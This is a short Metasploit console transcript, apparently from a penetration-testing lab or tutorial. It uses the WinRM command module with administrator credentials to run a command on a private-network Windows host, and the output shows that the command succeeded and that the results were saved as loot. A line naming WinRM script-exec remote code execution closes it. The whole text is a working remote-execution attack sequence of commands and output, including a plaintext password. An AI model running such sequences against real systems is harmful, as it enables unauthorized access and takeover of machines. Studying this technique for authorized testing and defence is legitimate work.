msf5 auxiliary(scanner/winrm/winrm_cmd) > set CMD whoami
CMD => whoami
msf5 auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD tinkerbell
PASSWORD => tinkerbell
msf5 auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 10.0.20.140
RHOSTS => 10.0.20.140
msf5 auxiliary(scanner/winrm/winrm_cmd) > set USERNAME administrator
USERNAME => administrator
msf5 auxiliary(scanner/winrm/winrm_cmd) > run
[+] 10.0.20.140:5985 : server\administrator
[+] Results saved to /root/.msf4/loot/20220917210947_default_10.0.20.140_winrm.cmd_result_789998.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/winrm/winrm_cmd) >
WinRM Script Exec Remote Code Execution